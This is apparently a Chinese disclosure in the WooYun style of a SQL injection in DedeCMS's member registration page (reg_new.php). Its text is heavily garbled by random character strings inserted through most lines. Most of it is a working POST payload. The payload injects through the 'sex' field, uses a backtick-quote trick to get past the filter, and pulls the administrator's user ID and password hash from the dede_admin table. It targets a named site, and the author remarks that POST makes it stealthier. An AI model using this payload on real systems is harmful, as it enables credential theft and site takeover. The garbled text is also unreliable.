漏洞类型: SQL注射漏洞
" N, c/ n. \% q8 g1 e; b i简要描述: Q$ p Q( `) z8 Z9 D
* D- I: z6 W, D
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.. B1 \" d1 }5 @; e1 E
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
. I% l+ O& C L5 y详细说明:跟这个漏洞- v* S/ T) t/ m' Z
" s6 O# i9 @9 ?8 a2 ^/ XWooYun: Dedecms SQL注射导致审核机制绕过漏洞
1 b; F ~- J" K E) i是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
1 U/ i7 n+ k' R" FPOST提交以下数据,其实不用POST提交的,这样隐蔽点.' C* J: [& [. P( l6 h
+ h% b0 e$ U0 o' U. f. G8 F6 s
www.political-security.com/member/reg_new.php: G7 J M6 K" f1 s; c
% o: U! G& b! c; a6 }1 W9 y I, z+ [. R3 OPOST
# z6 _( _/ z, |1 y0 D, q7 ~4 v" S% r 6 W& y7 M9 O/ I7 N6 m s( |
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&, R$ ^$ |% q. U& p
userid=c4rp3nt3r&uname=c4rp3nt3r" q6 x) f9 j7 q* U! f9 t6 |
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss. \; ^( u2 x# ]: a0 F. W
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`," ^* `8 M8 r3 V# B9 G
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
& ]; ^; g7 @/ _+ y% U# T8 |1 u%00&vdcode=glos&agree= |